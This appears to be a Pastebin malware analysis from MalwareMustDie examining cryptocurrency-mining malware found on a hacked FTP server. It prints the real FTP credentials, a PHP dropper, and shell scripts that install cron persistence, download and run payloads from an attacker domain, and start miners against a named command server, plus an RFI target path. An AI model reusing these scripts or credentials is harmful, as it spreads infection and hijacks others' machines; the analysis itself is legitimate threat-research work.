Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // MalwareMustdie - Case #8
- // Report base: Jorney to hacked FTP sites, url:
- // http://blog.malwaremustdie.org/2014/05/a-journey-to-abused-ftp-sites-story-of.html
- // http://blog.malwaremustdie.org/2014/06/a-journey-to-abused-ftp-sites-story-of.html
- // Samples: http://www.mediafire.com/download/agkazxpg4ie3eqg/Case8-PErl-miners.7z
- $ curl ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/^
- -rwxr-xr-x 1 root root 872 May 20 00:55 a
- -rw-r--r-- 1 root root 1008 May 20 00:56 bot
- -rw-r--r-- 1 padlezardftp psacln 15138 Apr 16 12:33 botphp
- -rwxr-xr-x 1 root root 283 May 2 04:25 c
- -rwxr-xr-x 1 root root 379680 Dec 3 2013 clamav
- -rw-r--r-- 1 padlezardftp psacln 753161 Feb 27 07:19 iexplorer.exe
- -rw-r--r-- 1 padlezardftp psacln 671836 Mar 19 10:35 init.exe
- -rwxr-xr-x 1 root root 15700 Mar 12 05:33 lol
- -rw-r--r-- 1 padlezardftp psacln 751993 Apr 24 12:26 ovi.exe
- -rw-r--r-- 1 root root 26585 Jun 1 19:56 php
- -rw-r--r-- 1 root root 15713 Apr 30 01:34 plm
- -rw-r--r-- 1 root root 26548 Jun 1 10:16 s0nia
- -rwxr-xr-x 1 root root 518288 Dec 3 2013 sh
- -rwxr-xr-x 1 root root 283 May 2 04:25 update
- -rwxr-xr-x 1 root root 319292 Sep 30 2013 upx
- // check ELF:
- $ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep ELF
- clamav: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x11473c67e3bd026f1c3ce7458b836b15498365c4, stripped
- sh: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xb7880c540a3530b2831b1618512b5f90269151b8, stripped
- upx: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
- $
- // Check PE:
- $ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep PE
- iexplorer.exe: PE32 executable (GUI) Intel 80386, for MS Windows
- init.exe: PE32 executable (GUI) Intel 80386, for MS Windows
- ovi.exe: PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
- $
- // Check PHP:
- $ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep PHP
- bot: PHP script, ASCII text
- $
- // Check Perl Script:
- $ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep Perl
- lol: Perl script, ASCII text executable
- plm: Perl script, ASCII text executable
- $
- // Check other formats:
- $ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep -v ^ELF\|PE\|PHP\|Perl^
- a: POSIX shell script, ASCII text executable
- botphp: C++ source, ASCII text
- c: POSIX shell script, ASCII text executable
- php: data
- s0nia: data
- update: POSIX shell script, ASCII text executable
- $
- // The ELFs:
- // upx - real one..
- .rodata:0x080C6680 0x0042 unsigned int upx_adler32(const void*, unsigned int, unsigned int)
- .rodata:0x080C66E0 0x00A5 int upx_compress(const unsigned char*, unsigned int, unsigned char*, unsigned int*, upx_callback_t*, int, int, const upx_compress_config_t*, upx_compress_result_t*)
- .rodata:0x080C67A0 0x0079 int upx_decompress(const unsigned char*, unsigned int, unsigned char*, unsigned int*, int, const upx_compress_result_t*)
- .rodata:0x080C6820 0x008F int upx_test_overlap(const unsigned char*, const unsigned char*, unsigned int, unsigned int, unsigned int*, int, const upx_compress_result_t*)
- .rodata:0x080C9371 0x00AA Ultimate Packer for eXecutables\n Copyright (C) 1996 - %s\nUPX %-10s Markus Oberhumer, Laszlo Molnar & John Reiser %14s\n\n
- .rodata:0x080C941B 0x0039 Usage: %s [-123456789dlthVL] [-qvfk] [-o file] %sfile..\n
- .rodata:0x080C947B 0x000C \nCommands:\n
- .rodata:0x080C9491 0x0034 --best compress best (can be slow for big files)\n
- // clamav - actually is a ^minerd^ - bitcoin mining ELF
- .rodata:0x08096848 0x002B Try `minerd --help^ for more information.\n
- .rodata:0x08096874 0x06A9 Usage: minerd [OPTIONS]\nOptions:\n -a, --algo=ALGO specify the algorithm to use\n scrypt scrypt(1024, 1, 1) (default)\n sha256d SHA-256d\n -o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)\n -O, --userpass=U:P username:password pair for mining server\n -u, --user=USERNAME username for mining server\n -p, --pass=PASSWORD password for mining server\n --cert=FILE certificate for mining server using SSL\n -x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy\n -t, --threads=N number of miner threads (default: number of processors)\n -r, --retries=N number of times to retry if a network call fails\n (default: retry indefinitely)\n
- -R, --retry-pause=N time to pause between retries, in seconds (default: 0)\n -T, --timeout=N network timeout, in seconds (default: 270)\n -s, --scantime=N upper bound on time spent s
- .rodata:0x08096F20 0x002A accepted: %lu/%lu (%.2f%%), %s khash/s %s
- .rodata:0x08096F4C 0x002D DEBUG: job_id=^%s^ extranonce2=%s ntime=%08x
- .rodata:0x08096F7C 0x001F Stratum connection interrupted
- .rodata:0x08096F9C 0x002E {\^method\^: \^getwork\^, \^params\^: [], \^id\^:0}\r\n
- .rodata:0x08096FCC 0x0027 DEBUG: stale work detected, discarding
- .rodata:0x08096FF4 0x004E {\^method\^: \^mining.submit\^, \^params\^: [\^%s\^, \^%s\^, \^%s\^, \^%s\^, \^%s\^], \^id\^:4}
- .rodata:0x08097044 0x002E submit_upstream_work stratum_send_line failed
- .rodata:0x08097074 0x0034 {\^method\^: \^getwork\^, \^params\^: [ \^%s\^ ], \^id\^:1}\r\n
- .rodata:0x080970A8 0x002A submit_upstream_work json_rpc_call failed
- // sh - is also a ^minerd^, below is different ^better^ vector to string the bins:
- .rodata:0x06C318 Usage: minerd [OPTIONS]
- .rodata:0x06C330 Options:
- .rodata:0x06C339 -a, --algo=ALGO specify the algorithm to use
- .rodata:0x06C36E scrypt scrypt(1024, 1, 1) (default)
- .rodata:0x06C3AF sha256d SHA-256d
- .rodata:0x06C3DC -o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
- .rodata:0x06C42B -O, --userpass=U:P username:password pair for mining server
- .rodata:0x06C46C -u, --user=USERNAME username for mining server
- .rodata:0x06C49F -p, --pass=PASSWORD password for mining server
- .rodata:0x06C4D2 --cert=FILE certificate for mining server using SSL
- .rodata:0x06C512 -x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
- .rodata:0x06C552 -t, --threads=N number of miner threads (default: number of processors)
- .rodata:0x06C5A2 -r, --retries=N number of times to retry if a network call fails
- .rodata:0x06C5EB (default: retry indefinitely)
- .rodata:0x06C623 -R, --retry-pause=N time to pause between retries, in seconds (default: 30)
- .rodata:0x06C673 -T, --timeout=N network timeout, in seconds (default: 270)
- .rodata:0x06C6B6 -s, --scantime=N upper bound on time spent scanning current work when
- .rodata:0x06C703 long polling is unavailable, in seconds (default: 5)
- .rodata:0x06C752 --no-longpoll disable X-Long-Polling support
- .rodata:0x06C789 --no-stratum disable X-Stratum support
- .rodata:0x06C7BB -q, --quiet disable per-thread hashmeter output
- .rodata:0x06C7F7 -D, --debug enable debug output
- .rodata:0x06C823 -P, --protocol-dump verbose dump of protocol-level activities
- .rodata:0x06C865 -S, --syslog use system log for output messages
- .rodata:0x06C8A0 -B, --background run the miner in the background
- .rodata:0x06C8D8 --benchmark run in offline benchmark mode
- .rodata:0x06C90E -c, --config=FILE load a JSON-format configuration file
- .rodata:0x06C94C -V, --version display version information and exit
- .rodata:0x06C989 -h, --help display this help text and exit
- .rodata:0x06C9C8 accepted: %lu/%lu (%.2f%%), %s khash/s %s
- .rodata:0x06C9F8 DEBUG: job_id=^%s^ extranonce2=%s ntime=%08x
- .rodata:0x06CA28 Stratum connection interrupted
- .rodata:0x06CA48 {^method^: ^getwork^, ^params^: [], ^id^:0}
- .rodata:0x06CA78 DEBUG: stale work detected, discarding
- .rodata:0x06CAA0 {^method^: ^mining.submit^, ^params^: [^%s^, ^%s^, ^%s^, ^%s^, ^%s^], ^id^:4}
- .rodata:0x06CAF0 submit_upstream_work stratum_send_line failed
- .rodata:0x06CB20 {^method^: ^getwork^, ^params^: [ ^%s^ ], ^id^:1}
- // The PE are bitcoin Miner..
- https://www.virustotal.com/en/file/a343e06a05b863730ec07bbe02c8f3989669afd588603ecca64a73f2db6ed777/analysis/1397692298/
- https://www.virustotal.com/en/file/2c5146d815d387fd214a9fbdf5e95885f31512744be4b74b57cac8958e062d07/analysis/1400526645/
- https://www.virustotal.com/en/file/eb952920fb9104de08f661a47d76dc7ad5806fc90b2f3a1579da288bdc08066f/analysis/1401094548/
- // THE PHP is the script to infect OTHER hosts with init.exe
- <?php
- $win_local_file = ^c:\windows\init.exe^;
- $lin_local_file = ^/tmp/a^;
- $win_server_file = ^/httpdocs/init.exe^;
- $lin_server_file = ^/httpdocs/a^;
- $ftp_server = ^84.246.227.121^;
- $ftp_user_name = ^padlezardftp^;
- $ftp_user_pass = ^123456^;
- $result = exec(^sh /tmp/a^);
- echo php_uname();
- echo PHP_OS;
- if (strtoupper(substr(PHP_OS, 0, 3)) === ^WIN^) {
- $conn_id = ftp_connect($ftp_server);
- $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
- if (ftp_get($conn_id, $win_local_file, $win_server_file, FTP_BINARY)) {
- echo ^Successfully written to $local_file\n^;
- echo exec(^c:\windows\init.exe &del c:\windows\init.exe^);
- } else {
- echo ^There was a problem\n^;
- }
- ftp_close($conn_id);
- } else {
- $conn_id = ftp_connect($ftp_server);
- $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
- if (ftp_get($conn_id, $lin_local_file, $lin_server_file, FTP_BINARY)) {
- echo ^$result^;
- } else {
- echo ^There was a problem\n^;
- }
- ftp_close($conn_id);
- }
- ?>
- // THE PERLs...
- The ^lol^ and ^pLm^ contains the same code.
- Is an IRC PerlBot used to spread the infection for these miners.
- It has the Webapp vuln scanning, standard flood (TCP & UDP) and
- Basic HTTP DoS Flood function. Remoted by IRC or Shell.
- The code is here: http://pastebin.com/VQVzw7f9
- This perl bot is aiming this RFI. Found one, exploit it, then use the PHP script above
- to download the shits to new infect host.
- Vulnerable aimed is hinted by the bot scan
- query=^/SQuery/lib/gore.php?libpath=^
- Reference: http://www.exploit-db.com/exploits/2003/
- More ref: https://www.google.com/search?q=%2FSQuery%2Flib%2Fgore.php%3Flibpath%3D&ie=utf-8&oe=utf-8&client=ubuntu&channel=fs&gws_rd=ssl#channel=fs&nfpr=1&q=%2FSQuery%2Flib%2Fgore.php%3Flibpath%3D …
- // The way the attacker executed these files in this FTP is well described
- // in file ^a^:
- #!/bin/sh
- crontab -r
- cd /tmp
- rm -rf a* c* update*
- pwd > mech.dir
- dir=$(cat mech.dir)
- echo ^* * * * * $dir/update >/dev/null 2>&1^ > cron.d
- crontab cron.d
- crontab -l | grep update
- wget http://padlezard.com/update >> /dev/null &&
- curl -O http://padlezard.com/update >> /dev/null &&
- chmod u+x update
- #chattr -ia bash
- #chattr -ia *
- curl -O http://padlezard.com/clamav
- curl -O http://padlezard.com/sh
- wget http://padlezard.com/clamav
- wget http://padlezard.com/sh
- wget http://padlezard.com/plm
- curl -O http://padlezard.com/plm
- perl plm
- rm -rf plm*
- chmod +x sh
- chmod +x clamav
- mv clamav bash
- #kill -9 `ps x|grep miner|grep -v grep|awk ^{print $1}^`
- kill -9 `ps x|grep stratum|grep -v grep|awk ^{print $1}^`
- killall -9 kav m32 m64
- ./bash -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
- ./sh -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
- #chattr +ia bash
- #chattr +ia sh
- // Obviously via ^update^ that called GET HTTP in a compromised site
- // a (and ^c^) download request was sent to get this ^a^(and ^c^) to get the miners
- // and kicking the Perl bot scanner:
- #!/bin/sh
- plm=`ps x|grep 176.31.255.138:3333|grep -v grep|awk ^{print $7}^`
- if [ ^$plm^ != ^^ ]
- then echo ^MERGE!!!^
- else
- echo ^Starting!!!^
- wget http://padlezard.com/a && sh a >> /dev/null &
- curl -O http://padlezard.com/a && sh a >> /dev/null &
- fi
- // The CNC of this malicious operation is in 176.31.255.138:3333
- // again.. ahilarious famous malware gargabe can..The OVH, France:
- Req time: Wed Jun 4 22:50:59 JST 2014
- UP: 176.31.255.138
- Result: ns388807.ovh.net.|16276 | 176.31.0.0/16 | OVH | FR | OVH.COM | OVH SAS
- // There is another PHP pbot code called ^phpbot^
- is the older version, of pbot , no DDoS L7 HTTP functions
- // There are two more Perl^s PowerBot IRC Bot
- // in file called ^s0nia^ and ^php^
- Functions: Hacked the server important dirs (removal),
- UDP DoS, PortScanner, File Downloader, Shell Backdoor(backconnect), IRC attacks,
- // code for these Perl PowerBot is here:
- http://pastebin.com/iJX3xaNF
- -----
- #MalwareMustDie!!!!!!!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement